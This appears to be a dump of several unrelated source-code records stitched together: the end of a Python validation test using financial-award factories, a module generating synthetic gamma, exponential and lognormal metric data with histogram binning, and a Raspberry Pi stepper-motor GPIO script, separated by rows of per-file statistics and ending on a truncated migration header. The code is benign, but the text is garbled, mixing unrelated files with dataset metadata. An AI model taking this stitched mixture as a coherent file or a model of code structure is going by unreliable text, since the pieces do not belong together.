af1 = AwardFinancialFactory(**af_dict)
op1 = ObjectClassProgramActivityFactory(
ussgl480100_undelivered_or_fyb=af_dict['ussgl480100_undelivered_or_fyb'] + 1,
ussgl480100_undelivered_or_cpe=af_dict['ussgl480100_undelivered_or_cpe'] + 1,
ussgl483100_undelivered_or_cpe=af_dict['ussgl483100_undelivered_or_cpe'] + 1,
ussgl488100_upward_adjustm_cpe=af_dict['ussgl488100_upward_adjustm_cpe'] + 1,
obligations_undelivered_or_fyb=af_dict['obligations_undelivered_or_fyb'] + 1,
obligations_undelivered_or_cpe=af_dict['obligations_undelivered_or_cpe'] + 1,
ussgl490100_delivered_orde_fyb=af_dict['ussgl490100_delivered_orde_fyb'] + 1,
ussgl490100_delivered_orde_cpe=af_dict['ussgl490100_delivered_orde_cpe'] + 1,
ussgl493100_delivered_orde_cpe=af_dict['ussgl493100_delivered_orde_cpe'] + 1,
ussgl498100_upward_adjustm_cpe=af_dict['ussgl498100_upward_adjustm_cpe'] + 1,
obligations_delivered_orde_fyb=af_dict['obligations_delivered_orde_fyb'] + 1,
obligations_delivered_orde_cpe=af_dict['obligations_delivered_orde_cpe'] + 1,
ussgl480200_undelivered_or_fyb=af_dict['ussgl480200_undelivered_or_fyb'] + 1,
ussgl480200_undelivered_or_cpe=af_dict['ussgl480200_undelivered_or_cpe'] + 1,
ussgl483200_undelivered_or_cpe=af_dict['ussgl483200_undelivered_or_cpe'] + 1,
ussgl488200_upward_adjustm_cpe=af_dict['ussgl488200_upward_adjustm_cpe'] + 1,
gross_outlays_undelivered_fyb=af_dict['gross_outlays_undelivered_fyb'] + 1,
gross_outlays_undelivered_cpe=af_dict['gross_outlays_undelivered_cpe'] + 1,
ussgl490200_delivered_orde_cpe=af_dict['ussgl490200_delivered_orde_cpe'] + 1,
ussgl490800_authority_outl_fyb=af_dict['ussgl490800_authority_outl_fyb'] + 1,
ussgl490800_authority_outl_cpe=af_dict['ussgl490800_authority_outl_cpe'] + 1,
ussgl498200_upward_adjustm_cpe=af_dict['ussgl498200_upward_adjustm_cpe'] + 1,
gross_outlays_delivered_or_fyb=af_dict['gross_outlays_delivered_or_fyb'] + 1,
gross_outlays_delivered_or_cpe=af_dict['gross_outlays_delivered_or_cpe'] + 1,
gross_outlay_amount_by_pro_fyb=af_dict['gross_outlay_amount_by_awa_fyb'] + 1,
gross_outlay_amount_by_pro_cpe=af_dict['gross_outlay_amount_by_awa_cpe'] + 1,
obligations_incurred_by_pr_cpe=af_dict['obligations_incurred_byawa_cpe'] + 1,
ussgl487100_downward_adjus_cpe=af_dict['ussgl487100_downward_adjus_cpe'] + 1,
ussgl497100_downward_adjus_cpe=af_dict['ussgl497100_downward_adjus_cpe'] + 1,
ussgl487200_downward_adjus_cpe=af_dict['ussgl487200_downward_adjus_cpe'] + 1,
ussgl497200_downward_adjus_cpe=af_dict['ussgl497200_downward_adjus_cpe'] + 1,
deobligations_recov_by_pro_cpe=af_dict['deobligations_recov_by_awa_cpe'] + 1,
tas=af_dict['tas'],
program_activity_code=af_dict['program_activity_code'],
submission_id=af_dict['submission_id']
)
op2 = ObjectClassProgramActivityFactory(
ussgl480100_undelivered_or_fyb=af_dict['ussgl480100_undelivered_or_fyb'] + 1,
ussgl480100_undelivered_or_cpe=af_dict['ussgl480100_undelivered_or_cpe'] + 1,
ussgl483100_undelivered_or_cpe=af_dict['ussgl483100_undelivered_or_cpe'] + 1,
ussgl488100_upward_adjustm_cpe=af_dict['ussgl488100_upward_adjustm_cpe'] + 1,
obligations_undelivered_or_fyb=af_dict['obligations_undelivered_or_fyb'] + 1,
obligations_undelivered_or_cpe=af_dict['obligations_undelivered_or_cpe'] + 1,
ussgl490100_delivered_orde_fyb=af_dict['ussgl490100_delivered_orde_fyb'] + 1,
ussgl490100_delivered_orde_cpe=af_dict['ussgl490100_delivered_orde_cpe'] + 1,
ussgl493100_delivered_orde_cpe=af_dict['ussgl493100_delivered_orde_cpe'] + 1,
ussgl498100_upward_adjustm_cpe=af_dict['ussgl498100_upward_adjustm_cpe'] + 1,
obligations_delivered_orde_fyb=af_dict['obligations_delivered_orde_fyb'] + 1,
obligations_delivered_orde_cpe=af_dict['obligations_delivered_orde_cpe'] + 1,
ussgl480200_undelivered_or_fyb=af_dict['ussgl480200_undelivered_or_fyb'] + 1,
ussgl480200_undelivered_or_cpe=af_dict['ussgl480200_undelivered_or_cpe'] + 1,
ussgl483200_undelivered_or_cpe=af_dict['ussgl483200_undelivered_or_cpe'] + 1,
ussgl488200_upward_adjustm_cpe=af_dict['ussgl488200_upward_adjustm_cpe'] + 1,
gross_outlays_undelivered_fyb=af_dict['gross_outlays_undelivered_fyb'] + 1,
gross_outlays_undelivered_cpe=af_dict['gross_outlays_undelivered_cpe'] + 1,
ussgl490200_delivered_orde_cpe=af_dict['ussgl490200_delivered_orde_cpe'] + 1,
ussgl490800_authority_outl_fyb=af_dict['ussgl490800_authority_outl_fyb'] + 1,
ussgl490800_authority_outl_cpe=af_dict['ussgl490800_authority_outl_cpe'] + 1,
ussgl498200_upward_adjustm_cpe=af_dict['ussgl498200_upward_adjustm_cpe'] + 1,
gross_outlays_delivered_or_fyb=af_dict['gross_outlays_delivered_or_fyb'] + 1,
gross_outlays_delivered_or_cpe=af_dict['gross_outlays_delivered_or_cpe'] + 1,
gross_outlay_amount_by_pro_fyb=af_dict['gross_outlay_amount_by_awa_fyb'] + 1,
gross_outlay_amount_by_pro_cpe=af_dict['gross_outlay_amount_by_awa_cpe'] + 1,
obligations_incurred_by_pr_cpe=af_dict['obligations_incurred_byawa_cpe'] + 1,
ussgl487100_downward_adjus_cpe=af_dict['ussgl487100_downward_adjus_cpe'] + 1,
ussgl497100_downward_adjus_cpe=af_dict['ussgl497100_downward_adjus_cpe'] + 1,
ussgl487200_downward_adjus_cpe=af_dict['ussgl487200_downward_adjus_cpe'] + 1,
ussgl497200_downward_adjus_cpe=af_dict['ussgl497200_downward_adjus_cpe'] + 1,
deobligations_recov_by_pro_cpe=af_dict['deobligations_recov_by_awa_cpe'] + 1,
tas='some-other-tas',
program_activity_code=af_dict['program_activity_code'],
submission_id=af_dict['submission_id']
)
op3 = ObjectClassProgramActivityFactory(
ussgl480100_undelivered_or_fyb=af_dict['ussgl480100_undelivered_or_fyb'] + 1,
ussgl480100_undelivered_or_cpe=af_dict['ussgl480100_undelivered_or_cpe'] + 1,
ussgl483100_undelivered_or_cpe=af_dict['ussgl483100_undelivered_or_cpe'] + 1,
ussgl488100_upward_adjustm_cpe=af_dict['ussgl488100_upward_adjustm_cpe'] + 1,
obligations_undelivered_or_fyb=af_dict['obligations_undelivered_or_fyb'] + 1,
obligations_undelivered_or_cpe=af_dict['obligations_undelivered_or_cpe'] + 1,
ussgl490100_delivered_orde_fyb=af_dict['ussgl490100_delivered_orde_fyb'] + 1,
ussgl490100_delivered_orde_cpe=af_dict['ussgl490100_delivered_orde_cpe'] + 1,
ussgl493100_delivered_orde_cpe=af_dict['ussgl493100_delivered_orde_cpe'] + 1,
ussgl498100_upward_adjustm_cpe=af_dict['ussgl498100_upward_adjustm_cpe'] + 1,
obligations_delivered_orde_fyb=af_dict['obligations_delivered_orde_fyb'] + 1,
obligations_delivered_orde_cpe=af_dict['obligations_delivered_orde_cpe'] + 1,
ussgl480200_undelivered_or_fyb=af_dict['ussgl480200_undelivered_or_fyb'] + 1,
ussgl480200_undelivered_or_cpe=af_dict['ussgl480200_undelivered_or_cpe'] + 1,
ussgl483200_undelivered_or_cpe=af_dict['ussgl483200_undelivered_or_cpe'] + 1,
ussgl488200_upward_adjustm_cpe=af_dict['ussgl488200_upward_adjustm_cpe'] + 1,
gross_outlays_undelivered_fyb=af_dict['gross_outlays_undelivered_fyb'] + 1,
gross_outlays_undelivered_cpe=af_dict['gross_outlays_undelivered_cpe'] + 1,
ussgl490200_delivered_orde_cpe=af_dict['ussgl490200_delivered_orde_cpe'] + 1,
ussgl490800_authority_outl_fyb=af_dict['ussgl490800_authority_outl_fyb'] + 1,
ussgl490800_authority_outl_cpe=af_dict['ussgl490800_authority_outl_cpe'] + 1,
ussgl498200_upward_adjustm_cpe=af_dict['ussgl498200_upward_adjustm_cpe'] + 1,
gross_outlays_delivered_or_fyb=af_dict['gross_outlays_delivered_or_fyb'] + 1,
gross_outlays_delivered_or_cpe=af_dict['gross_outlays_delivered_or_cpe'] + 1,
gross_outlay_amount_by_pro_fyb=af_dict['gross_outlay_amount_by_awa_fyb'] + 1,
gross_outlay_amount_by_pro_cpe=af_dict['gross_outlay_amount_by_awa_cpe'] + 1,
obligations_incurred_by_pr_cpe=af_dict['obligations_incurred_byawa_cpe'] + 1,
ussgl487100_downward_adjus_cpe=af_dict['ussgl487100_downward_adjus_cpe'] + 1,
ussgl497100_downward_adjus_cpe=af_dict['ussgl497100_downward_adjus_cpe'] + 1,
ussgl487200_downward_adjus_cpe=af_dict['ussgl487200_downward_adjus_cpe'] + 1,
ussgl497200_downward_adjus_cpe=af_dict['ussgl497200_downward_adjus_cpe'] + 1,
deobligations_recov_by_pro_cpe=af_dict['deobligations_recov_by_awa_cpe'] + 1,
tas=af_dict['tas'],
program_activity_code='some-other-code',
submission_id=af_dict['submission_id']
)
errors = number_of_errors(_FILE, database, models=[af1, op1, op2, op3])
assert errors == 1
| 72.720721
| 108
| 0.769533
| 3,141
| 24,216
| 5.311047
| 0.036931
| 0.075531
| 0.074452
| 0.023738
| 0.959957
| 0.864704
| 0.802841
| 0.775267
| 0.765436
| 0.765436
| 0
| 0.112091
| 0.147877
| 24,216
| 332
| 109
| 72.939759
| 0.696341
| 0.013916
| 0
| 0.703226
| 0
| 0
| 0.35104
| 0.34278
| 0
| 0
| 0
| 0
| 0.009677
| 1
| 0.009677
| false
| 0
| 0.012903
| 0
| 0.022581
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
54495868ab4b502b7abcd7bb22195b1eadfd324a
| 15,188
|
py
|
Python
|
data_gen.py
|
sashapodkopaev/chrome-robust-hypothesis-testing
|
e3a2655f4d94f3987e3d670c8b66fb99c8d0cb45
|
[
"Apache-2.0"
] | null | null | null |
data_gen.py
|
sashapodkopaev/chrome-robust-hypothesis-testing
|
e3a2655f4d94f3987e3d670c8b66fb99c8d0cb45
|
[
"Apache-2.0"
] | null | null | null |
data_gen.py
|
sashapodkopaev/chrome-robust-hypothesis-testing
|
e3a2655f4d94f3987e3d670c8b66fb99c8d0cb45
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import pandas as pd
def generate_seq_from_gamma(num_of_obs, gamma_shape=25000, gamma_scale=0.1):
"""
Function that samples metric 1 for a given user
Parameters
----------
num_of_obs: int
number of observations for a given user
gamma_shape: float
shape paramter, or k^star, for the gamma distribution
gamma_scale: float
scale parameter, or theta^star, for the gamma distribution
Returns
----------
cur_observations: array_like
sampled metric 1 values for a given user
"""
# standard deviations for parameters of the gamma
shape_std_value = 2*gamma_shape
scale_std_value = 2*gamma_scale
# sample parameters
shape_array = np.random.normal(
loc=gamma_shape, scale=shape_std_value, size=num_of_obs)
scale_array = np.random.normal(
loc=gamma_scale, scale=scale_std_value, size=num_of_obs)
# truncate parameters
shape_array = np.maximum(shape_array, gamma_shape/3)
scale_array = np.maximum(scale_array, gamma_scale/3)
# sample metric values
cur_observations = np.random.gamma(shape_array, scale_array)
return cur_observations
def generate_raw_data(number_of_users, gamma_shape=25000, gamma_scale=0.1):
"""
Function that is used to generate Metric 1;
full description can be found in the supporting notebook
Parameters
----------
number_of_users: int
number of users in given treatment/control group
gamma_shape: float
shape parameter, or k^star, for the gamma distribution
gamma_scale: float
scale parameter, or theta^star, for the gamma distribution
Returns
----------
raw_data: Dataframe
Dataframe with two columns:
- Client ID
- Metric value
"""
# sample number of observations per user
number_of_observations_per_user = np.random.geometric(
p=0.03, size=number_of_users)
# sample metric values for each user
raw_data = [generate_seq_from_gamma(num_of_obs, gamma_shape, gamma_scale)
for num_of_obs in number_of_observations_per_user]
ids = [np.repeat(client_id, num_of_obs) for client_id,
num_of_obs in enumerate(number_of_observations_per_user)]
# stack IDs and observations
ids_array = np.hstack(ids)
metric_values = np.hstack(raw_data)
return pd.DataFrame(np.vstack([ids_array, metric_values]).transpose(), columns=['Client ID', 'Metric Value'])
def generate_raw_data_exponential(number_of_users, scale_param=1):
"""
Function that generates per user data from exponential distribution
Parameters
----------
number_of_users: int
number of users in given treatment/control group
scale_param: float
scale parameter, or theta^star, for the gamma distribution
Returns
----------
raw_data: Dataframe
Dataframe with two columns:
- Client ID
- Metric value
"""
# sample number of observations per user
number_of_observations_per_user = np.random.geometric(
p=0.03, size=number_of_users)
# sample metric values for each user
raw_data = [np.random.exponential(scale=scale_param, size=num_of_obs)
for num_of_obs in number_of_observations_per_user]
ids = [np.repeat(client_id, num_of_obs) for client_id,
num_of_obs in enumerate(number_of_observations_per_user)]
# stack IDs and observations
ids_array = np.hstack(ids)
metric_values = np.hstack(raw_data)
return pd.DataFrame(np.vstack([ids_array, metric_values]).transpose(), columns=['Client ID', 'Metric Value'])
def generate_raw_data_lognormal(number_of_users, mean_param=0, sigma_param=1):
"""
Function that generates per user data from exponential distribution
Parameters
----------
number_of_users: int
number of users in given treatment/control group
mean_param: float
mean parameter for the lognormal distribution
sigma_param: float
std parameter for the lognormal distribution
Returns
----------
raw_data: Dataframe
Dataframe with two columns:
- Client ID
- Metric value
"""
# sample number of observations per user
number_of_observations_per_user = np.random.geometric(
p=0.03, size=number_of_users)
# sample metric values for each user
raw_data = [np.random.lognormal(mean=mean_param, sigma=sigma_param, size=num_of_obs)
for num_of_obs in number_of_observations_per_user]
ids = [np.repeat(client_id, num_of_obs) for client_id,
num_of_obs in enumerate(number_of_observations_per_user)]
# stack IDs and observations
ids_array = np.hstack(ids)
metric_values = np.hstack(raw_data)
return pd.DataFrame(np.vstack([ids_array, metric_values]).transpose(), columns=['Client ID', 'Metric Value'])
def generate_raw_data_mixture_of_lognormal(number_of_users, vec_of_means, vec_of_stds, weights):
"""
Function that generates per user data from exponential distribution
"""
# sample number of observations per user
number_of_observations_per_user = np.random.geometric(
p=0.03, size=number_of_users)
cluster_asgn = [np.random.choice([0, 1], size=num_of_obs, p=weights)
for num_of_obs in number_of_observations_per_user]
# sample metric values for each user
raw_data = [np.random.lognormal(mean=vec_of_means[cur_cluster_assignment],
sigma=vec_of_stds[cur_cluster_assignment],
size=len(cur_cluster_assignment))
for cur_cluster_assignment in cluster_asgn]
ids = [np.repeat(client_id, num_of_obs) for client_id,
num_of_obs in enumerate(number_of_observations_per_user)]
# stack IDs and observations
ids_array = np.hstack(ids)
metric_values = np.hstack(raw_data)
return pd.DataFrame(np.vstack([ids_array, metric_values]).transpose(), columns=['Client ID', 'Metric Value'])
def get_binned_data_client_level(raw_data, bins_boundaries):
"""
Function that bins raw data
Parameters
----------
raw_data: Dataframe
raw data to be used to create binned data;
Dataframe has two columns:
- Client ID
- Metric value
bins_boundaries: array_like
array of bins' boundaries
(With the right-most boundary for the overflow bins
and left-most boundary for underflow bin included)
Example: [0,1,2,3,4] would correspond to bins:
(0,1], (1,2], (2,3], (3,4]
Returns
----------
binned_data: Dataframe
binned data at a Client level
"""
# get number of bins
num_of_hist_bins = len(bins_boundaries) - 1
# using list comprehension, create list of lists with first entry being the client ID,
# followed by the histogram for the client
binned_data = [[[cur_id] + np.histogram(cur_group_of_metric_values['Metric Value'].values,
bins=bins_boundaries)[0].tolist()]
for cur_id, cur_group_of_metric_values in raw_data.groupby('Client ID')]
# convert an array to output Dataframe
cols = ['Client ID'] + ['Bin ' + str(i) for i in range(num_of_hist_bins)]
binned_data = pd.DataFrame(np.vstack(binned_data), columns=cols)
return binned_data
def get_binned_data_cookie_bucket_level(raw_data, number_of_buckets, bins_boundaries):
"""
Function that bins raw data and aggregates histograms at a cookie bucket level
Parameters
----------
raw_data: Dataframe
raw data to be used to create binned data;
Dataframe has two columns:
- Client ID
- Metric value
number_of_buckets: int
number of cookie buckets to be used
Bucketing is performed based on the remained of
the ID when divided by number_of_cookie_buckets
bins_boundaries: array_like
array of bins' boundaries
(With the right-most boundary for the overflow bins
and left-most boundary for underflow bin included)
Example: [0,1,2,3,4] would correspond to bins:
(0,1], (1,2], (2,3], (3,4]
Returns
----------
binned_data: Dataframe
Dataframe with each row corresponding to the histogram
of a given cookie buckets
"""
# get number of bins
num_of_hist_bins = len(bins_boundaries) - 1
# get Clients' buckets
buckets = raw_data['Client ID'] % number_of_buckets
binned_data = [np.histogram(cur_group_of_metric_values['Metric Value'].values,
bins=bins_boundaries)[0]
for _, cur_group_of_metric_values in raw_data.groupby(buckets)]
# convert an array to output Dataframe
cols = ['Bin ' + str(i) for i in range(num_of_hist_bins)]
binned_data = pd.DataFrame(np.vstack(binned_data), columns=cols)
return binned_data
def generate_data_mixture_exp_bucket_level(number_of_users, scale_params, weights, num_of_cookie_buckets, bins_boundaries):
"""
Function that generates data from mixture of exponential distribution, but at a cookie bucket level
i.e. data pts in a given cookie bucket is generated from the same distribution, but shift might occur
in some (small number of buckets)
-- might be generalized to more components than two
"""
# sample number of observations per user
treatment_number_of_observations_per_user = np.random.geometric(
p=0.03, size=number_of_users[0])
control_number_of_observations_per_user = np.random.geometric(
p=0.03, size=number_of_users[1])
# get IDs to compute number of observations in each cookie bucket
treat_user_ids = np.arange(number_of_users[0])
control_user_ids = np.arange(number_of_users[1])
# match clients with cookie buckets
treat_bucket_assignment = treat_user_ids % num_of_cookie_buckets
control_bucket_assignment = control_user_ids % num_of_cookie_buckets
# compute number of observations per cookie bucket
pos_cookie_bucket_indices = np.arange(num_of_cookie_buckets)
num_of_obs_cookie_bucket_treat = [treatment_number_of_observations_per_user[treat_bucket_assignment
== cur_cookie_bucket].sum()
for cur_cookie_bucket in pos_cookie_bucket_indices]
num_of_obs_cookie_bucket_control = [control_number_of_observations_per_user[control_bucket_assignment
== cur_cookie_bucket].sum()
for cur_cookie_bucket in pos_cookie_bucket_indices]
# define which component to sample from for each cookie bucket
comp_assgn = np.random.choice(
np.arange(len(scale_params)), size=num_of_cookie_buckets, p=weights)
# sample data
raw_obs_treat = [np.random.exponential(scale=scale_params[comp_assgn[cur_cookie_bucket]],
size=num_of_obs_cookie_bucket_treat[cur_cookie_bucket])
for cur_cookie_bucket in pos_cookie_bucket_indices]
raw_obs_control = [np.random.exponential(scale=scale_params[comp_assgn[cur_cookie_bucket]],
size=num_of_obs_cookie_bucket_control[cur_cookie_bucket])
for cur_cookie_bucket in pos_cookie_bucket_indices]
# get binned data
binned_data_treat = [np.histogram(cur_bucket, bins=bins_boundaries)[0]
for cur_bucket in raw_obs_treat]
binned_data_control = [np.histogram(cur_bucket, bins=bins_boundaries)[0]
for cur_bucket in raw_obs_control]
return np.stack(binned_data_treat), np.stack(binned_data_control)
def generate_data_single_corrupted_exp_bucket_level(number_of_users, scale_params, num_of_cookie_buckets, bins_boundaries):
"""
Function that generates data from mixture of exponential distribution, but at a cookie bucket level
i.e. data pts in a given cookie bucket is generated from the same distribution, but shift might occur
in one cookie bucket irrespectively to the total number of cookie buckets
-- might be generalized to more components than two
"""
# sample number of observations per user
treatment_number_of_observations_per_user = np.random.geometric(
p=0.03, size=number_of_users[0])
control_number_of_observations_per_user = np.random.geometric(
p=0.03, size=number_of_users[1])
# get IDs to compute number of observations in each cookie bucket
treat_user_ids = np.arange(number_of_users[0])
control_user_ids = np.arange(number_of_users[1])
# match clients with cookie buckets
treat_bucket_assignment = treat_user_ids % num_of_cookie_buckets
control_bucket_assignment = control_user_ids % num_of_cookie_buckets
# compute number of observations per cookie bucket
pos_cookie_bucket_indices = np.arange(num_of_cookie_buckets)
num_of_obs_cookie_bucket_treat = [treatment_number_of_observations_per_user[treat_bucket_assignment
== cur_cookie_bucket].sum()
for cur_cookie_bucket in pos_cookie_bucket_indices]
num_of_obs_cookie_bucket_control = [control_number_of_observations_per_user[control_bucket_assignment
== cur_cookie_bucket].sum()
for cur_cookie_bucket in pos_cookie_bucket_indices]
# define which component to sample from for each cookie bucket
comp_assgn = np.zeros(num_of_cookie_buckets, dtype='int')
comp_assgn[0] = 1
np.random.shuffle(comp_assgn)
# sample data
raw_obs_treat = [np.random.exponential(scale=scale_params[comp_assgn[cur_cookie_bucket]],
size=num_of_obs_cookie_bucket_treat[cur_cookie_bucket])
for cur_cookie_bucket in pos_cookie_bucket_indices]
raw_obs_control = [np.random.exponential(scale=scale_params[comp_assgn[cur_cookie_bucket]],
size=num_of_obs_cookie_bucket_control[cur_cookie_bucket])
for cur_cookie_bucket in pos_cookie_bucket_indices]
# get binned data
binned_data_treat = [np.histogram(cur_bucket, bins=bins_boundaries)[0]
for cur_bucket in raw_obs_treat]
binned_data_control = [np.histogram(cur_bucket, bins=bins_boundaries)[0]
for cur_bucket in raw_obs_control]
return np.stack(binned_data_treat), np.stack(binned_data_control)
| 38.744898
| 123
| 0.662563
| 2,005
| 15,188
| 4.716209
| 0.101247
| 0.054146
| 0.065567
| 0.068105
| 0.808587
| 0.79558
| 0.785321
| 0.770093
| 0.762056
| 0.732551
| 0
| 0.008444
| 0.267053
| 15,188
| 391
| 124
| 38.84399
| 0.840999
| 0.346392
| 0
| 0.676692
| 1
| 0
| 0.015597
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.067669
| false
| 0
| 0.015038
| 0
| 0.150376
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
545d98048e2dcc8a1e57a265df752d04bbad1fd4
| 6,499
|
py
|
Python
|
src/motor1.py
|
Aeturnum7/Automate-AI-Chess
|
6b691173ea716424017126c89bd0d0aa975e7d05
|
[
"MIT"
] | 4
|
2019-06-26T10:09:50.000Z
|
2020-11-21T07:55:59.000Z
|
src/motor1.py
|
Aeturnum7/Automate-AI-Chess
|
6b691173ea716424017126c89bd0d0aa975e7d05
|
[
"MIT"
] | 2
|
2019-06-27T22:52:43.000Z
|
2019-10-02T17:48:45.000Z
|
src/motor1.py
|
Aeturnum7/Automate-AI-Chess
|
6b691173ea716424017126c89bd0d0aa975e7d05
|
[
"MIT"
] | 3
|
2019-06-30T18:40:22.000Z
|
2019-10-16T09:42:56.000Z
|
import RPi.GPIO as GPIO
import time
in3 = 36
in2 = 32
in1 = 22
in4 = 38
out1 = in2
out2 = in3
out3 = in1
out4 = in4
i = 0
positive = 0
negative = 0
y = 0
slp = 0.001
enb=40
ena=18
GPIO.setmode(GPIO.BOARD)
GPIO.setup(enb, GPIO.OUT)
GPIO.output(enb, GPIO.HIGH)
GPIO.setup(ena, GPIO.OUT)
GPIO.output(ena, GPIO.HIGH)
GPIO.setup(out1, GPIO.OUT)
GPIO.setup(out2, GPIO.OUT)
GPIO.setup(out3, GPIO.OUT)
GPIO.setup(out4, GPIO.OUT)
nstep=20
def rotate(dir):
i = 0
positive = 0
negative = 0
y = 0
slp = 0.001
x = 400 * dir
if x > 0 and x <= 400:
for y in range(x, 0, -1):
if negative == 1:
if i == 7:
i = 0
else:
i = i + 1
y = y + 2
negative = 0
positive = 1
# print((x+1)-y)
if i == 0:
GPIO.output(out1, GPIO.HIGH)
GPIO.output(out2, GPIO.LOW)
GPIO.output(out3, GPIO.LOW)
GPIO.output(out4, GPIO.LOW)
time.sleep(slp)
elif i == 1:
# time.sleep(1)
GPIO.output(out1, GPIO.HIGH)
GPIO.output(out2, GPIO.HIGH)
GPIO.output(out3, GPIO.LOW)
GPIO.output(out4, GPIO.LOW)
time.sleep(slp)
elif i == 2:
# time.sleep(1)
GPIO.output(out1, GPIO.LOW)
GPIO.output(out2, GPIO.HIGH)
GPIO.output(out3, GPIO.LOW)
GPIO.output(out4, GPIO.LOW)
time.sleep(slp)
elif i == 3:
# time.sleep(1)
GPIO.output(out1, GPIO.LOW)
GPIO.output(out2, GPIO.HIGH)
GPIO.output(out3, GPIO.HIGH)
GPIO.output(out4, GPIO.LOW)
time.sleep(slp)
elif i == 4:
# time.sleep(1)
GPIO.output(out1, GPIO.LOW)
GPIO.output(out2, GPIO.LOW)
GPIO.output(out3, GPIO.HIGH)
GPIO.output(out4, GPIO.LOW)
time.sleep(slp)
elif i == 5:
# time.sleep(1)
GPIO.output(out1, GPIO.LOW)
GPIO.output(out2, GPIO.LOW)
GPIO.output(out3, GPIO.HIGH)
GPIO.output(out4, GPIO.HIGH)
time.sleep(slp)
elif i == 6:
# time.sleep(1)
GPIO.output(out1, GPIO.LOW)
GPIO.output(out2, GPIO.LOW)
GPIO.output(out3, GPIO.LOW)
GPIO.output(out4, GPIO.HIGH)
time.sleep(slp)
elif i == 7:
# time.sleep(1)
GPIO.output(out1, GPIO.HIGH)
GPIO.output(out2, GPIO.LOW)
GPIO.output(out3, GPIO.LOW)
GPIO.output(out4, GPIO.HIGH)
time.sleep(slp)
# time.sleep(1)
if i == 7:
i = 0
continue
i = i + 1
elif x < 0 and x >= -400:
x = x * -1
for y in range(x, 0, -1):
if positive == 1:
if i == 0:
i = 7
else:
i = i - 1
y = y + 3
positive = 0
negative = 1
# print((x+1)-y)
if i == 0:
GPIO.output(out1, GPIO.HIGH)
GPIO.output(out2, GPIO.LOW)
GPIO.output(out3, GPIO.LOW)
GPIO.output(out4, GPIO.LOW)
time.sleep(slp)
elif i == 1:
# time.sleep(1)
GPIO.output(out1, GPIO.HIGH)
GPIO.output(out2, GPIO.HIGH)
GPIO.output(out3, GPIO.LOW)
GPIO.output(out4, GPIO.LOW)
time.sleep(slp)
elif i == 2:
# time.sleep(1)
GPIO.output(out1, GPIO.LOW)
GPIO.output(out2, GPIO.HIGH)
GPIO.output(out3, GPIO.LOW)
GPIO.output(out4, GPIO.LOW)
time.sleep(slp)
elif i == 3:
# time.sleep(1)
GPIO.output(out1, GPIO.LOW)
GPIO.output(out2, GPIO.HIGH)
GPIO.output(out3, GPIO.HIGH)
GPIO.output(out4, GPIO.LOW)
time.sleep(slp)
elif i == 4:
# time.sleep(1)
GPIO.output(out1, GPIO.LOW)
GPIO.output(out2, GPIO.LOW)
GPIO.output(out3, GPIO.HIGH)
GPIO.output(out4, GPIO.LOW)
time.sleep(slp)
elif i == 5:
# time.sleep(1)
GPIO.output(out1, GPIO.LOW)
GPIO.output(out2, GPIO.LOW)
GPIO.output(out3, GPIO.HIGH)
GPIO.output(out4, GPIO.HIGH)
time.sleep(slp)
elif i == 6:
# time.sleep(1)
GPIO.output(out1, GPIO.LOW)
GPIO.output(out2, GPIO.LOW)
GPIO.output(out3, GPIO.LOW)
GPIO.output(out4, GPIO.HIGH)
time.sleep(slp)
elif i == 7:
# time.sleep(1)
GPIO.output(out1, GPIO.HIGH)
GPIO.output(out2, GPIO.LOW)
GPIO.output(out3, GPIO.LOW)
GPIO.output(out4, GPIO.HIGH)
time.sleep(slp)
# time.sleep(1)
if i == 0:
i = 7
continue
i = i - 1
def rotatemotor(x):
GPIO.output(out1, GPIO.LOW)
GPIO.output(out2, GPIO.LOW)
GPIO.output(out3, GPIO.LOW)
GPIO.output(out4, GPIO.LOW)
dir = 1
if x < 0:
dir = -1
x = x * -1
for i in range(x):
rotate(dir)
# try:
# while 1:
# # GPIO.output(out1, GPIO.LOW)
# # GPIO.output(out2, GPIO.LOW)
# # GPIO.output(out3, GPIO.LOW)
# # GPIO.output(out4, GPIO.LOW)
# x = input()
# rotatemotor(x)
# except KeyboardInterrupt:
# GPIO.cleanup()
def initializemotor1():
GPIO.setmode(GPIO.BOARD)
GPIO.setup(enb, GPIO.OUT)
GPIO.output(enb, GPIO.HIGH)
GPIO.setup(ena, GPIO.OUT)
GPIO.output(ena, GPIO.HIGH)
GPIO.setup(out1, GPIO.OUT)
GPIO.setup(out2, GPIO.OUT)
GPIO.setup(out3, GPIO.OUT)
GPIO.setup(out4, GPIO.OUT)
| 24.524528
| 44
| 0.436529
| 775
| 6,499
| 3.660645
| 0.086452
| 0.267889
| 0.139584
| 0.215721
| 0.88509
| 0.878745
| 0.865351
| 0.865351
| 0.854071
| 0.854071
| 0
| 0.055061
| 0.446684
| 6,499
| 264
| 45
| 24.617424
| 0.733871
| 0.078012
| 0
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016667
| false
| 0
| 0.011111
| 0
| 0.027778
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
54a549361d8656405a5287464b3ea174d1cb2439
| 3,106
|
py
|
Python
|
voxel_globe/meta/migrations/0018_auto_20161111_1628.py
|
ngageoint/voxel-globe
|
91f386de652b704942165889c10468b2c4cf4eec
|
[
"MIT"
] | 28
|
2015-07-27T23:57:24.000Z
|
2020-04-05T15:10:52.000Z
|
voxel_globe/meta/migrations/0018_auto_20161111_1628.py
|
VisionSystemsInc/voxel_globe
|
6eb3fca5586726428e9d914f7b730ca164c64a52
|
[
"MIT"
] | 50
|
2016-02-11T15:50:22.000Z
|
2016-10-27T22:38:27.000Z
|
voxel_globe/meta/migrations/0018_auto_20161111_1628.py
|
